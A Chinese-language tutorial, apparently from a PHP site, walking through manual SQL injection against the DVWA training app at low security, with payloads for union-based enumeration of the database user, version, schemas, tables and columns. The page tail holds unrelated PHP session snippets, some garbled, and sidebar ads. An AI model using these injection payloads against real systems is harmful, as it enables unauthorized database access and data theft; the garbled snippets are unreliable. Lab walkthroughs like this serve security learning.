這篇文章介紹的內容是關於DVWA之php mysql手工注入,有著一定的參考價值,現在分享給大家,有需要的朋友可以參考一下
dvwa安全等級為low,進入sql injection頁面,提示輸入user id,輸入正確的id,將顯示id first name,surname資訊。
嘗試輸入"'",傳回錯誤。存在註入點。
嘗試遍歷資料庫表,提示輸入的值為ID,初步判斷為數字類型注入。嘗試輸入:1 or 1=1,嘗試遍歷資料庫表。結果失敗。
-
1 或 1=1遍歷資料庫表失敗,猜測程式將此處看成了字元型,可嘗試輸入1' or '1'='1 後遍歷出資料庫中所有內容。下面嘗試結合各種不同語句,得到不同結果。
-
#利用order by 語句查詢,輸入1'order by 1 - - 頁面顯示正常,1'order by 2 - - 顯示正常,1'order by 3 - - 報錯,判斷查詢結果值為2列。 (注意語句中- - 後邊有空格,- -之間沒有空格)
-
使用user(),database(),version()三個內建函數得到資料庫的帳戶名,資料庫名稱,資料庫版本信息,首先參數注入 1' and 1=2 union select 1,2 - -(- -之間無空格,- -後有空格)。得出first name處顯示為查詢結果第一列的值,surname處顯示為查詢結果第二列的值。 -
#在得知顯示之後,使用user(), database(),version(),語句1' and 1=2 union select user(),database() - - 取得資料庫使用者以及資料庫名稱。連結資料庫的使用者為root@localhost,資料庫名稱為dvwa。
-
#透過注入1' and 1=2 union select version (),database() - - 得到資料庫版本為:5.0.90-community-nt。
-
透過注入:1'and 1=2 union select 1,@@global.version_compile_os from mysql.user –- 獲得操作系統資訊為win32.
-
# 透過注入: 1' and 1=2 union select 1,schema_name from information_schema.schemata - - 查詢mysql資料庫,所有資料庫名字。這裡利用了mysql預設資料庫information_scehma,該資料庫儲存了mysql所有資料庫和表格的資訊。
########## -
透過注入1' and exists(select * from users) - - 猜解dvwa資料庫中表名(該語句中表名為users,該表實際上沒有存放使用者名稱與密碼)
-
#猜解欄位名稱:1' and exists(select 欄位名稱from 表名) - - ,這裡實際測試欄位名稱first_name和last_name。實際語句 1' and exists(select first_name from users) - -以及1' and exists(select last_name from users) - - 猜解欄位名稱。
#在資料庫中爆出欄位內容。 1' and 1=2 union select first_name,last_name from users - - 這裡其實如果是存放管理員帳號的表,那麼使用者名稱和密碼就可以爆出了。
原始碼
相關推薦:
以上是DVWA之php+mysql手工注入的詳細內容。更多資訊請關注PHP中文網其他相關文章!
您如何開始PHP會話?May 02, 2025 am 12:16 AMtostartaphpsession,usesesses_start()attheScript'Sbeginning.1)placeitbeforeanyOutputtosetThesessionCookie.2)useSessionsforuserDatalikeloginstatusorshoppingcarts.3)regenerateSessiveIdStopreventFentfixationAttacks.s.4)考慮使用AttActAcks.s.s.4)
什麼是會話再生,如何提高安全性?May 02, 2025 am 12:15 AM會話再生是指在用戶進行敏感操作時生成新會話ID並使舊ID失效,以防會話固定攻擊。實現步驟包括:1.檢測敏感操作,2.生成新會話ID,3.銷毀舊會話ID,4.更新用戶端會話信息。
使用PHP會話時有哪些性能考慮?May 02, 2025 am 12:11 AMPHP会话对应用性能有显著影响。优化方法包括:1.使用数据库存储会话数据,提升响应速度;2.减少会话数据使用,只存储必要信息;3.采用非阻塞会话处理器,提高并发能力;4.调整会话过期时间,平衡用户体验和服务器负担;5.使用持久会话,减少数据读写次数。
PHP會話與Cookie有何不同?May 02, 2025 am 12:03 AMPHPsessionsareserver-side,whilecookiesareclient-side.1)Sessionsstoredataontheserver,aremoresecure,andhandlelargerdata.2)Cookiesstoredataontheclient,arelesssecure,andlimitedinsize.Usesessionsforsensitivedataandcookiesfornon-sensitive,client-sidedata.
PHP如何識別用戶的會話?May 01, 2025 am 12:23 AMphpIdentifiesauser'ssessionSessionSessionCookiesAndSessionId.1)whiwsession_start()被稱為,phpgeneratesainiquesesesessionIdStoredInacookInAcookInAcienamedInAcienamedphpsessIdontheuser'sbrowser'sbrowser.2)thisIdallowSphptpptpptpptpptpptpptpptoretoreteretrieetrieetrieetrieetrieetrieetreetrieetrieetrieetrieetremthafromtheserver。
確保PHP會議的一些最佳實踐是什麼?May 01, 2025 am 12:22 AMPHP會話的安全可以通過以下措施實現:1.使用session_regenerate_id()在用戶登錄或重要操作時重新生成會話ID。 2.通過HTTPS協議加密傳輸會話ID。 3.使用session_save_path()指定安全目錄存儲會話數據,並正確設置權限。
PHP會話文件默認存儲在哪裡?May 01, 2025 am 12:15 AMphpsessionFilesArestoredIntheDirectorySpecifiedBysession.save_path,通常是/tmponunix-likesystemsorc:\ windows \ windows \ temponwindows.tocustomizethis:tocustomizEthis:1)useession_save_save_save_path_path()
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
熱工具
禪工作室 13.0.1
強大的PHP整合開發環境
MantisBT
Mantis是一個易於部署的基於Web的缺陷追蹤工具,用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。
SublimeText3漢化版
中文版,非常好用
SublimeText3 Linux新版
SublimeText3 Linux最新版
SecLists
SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。
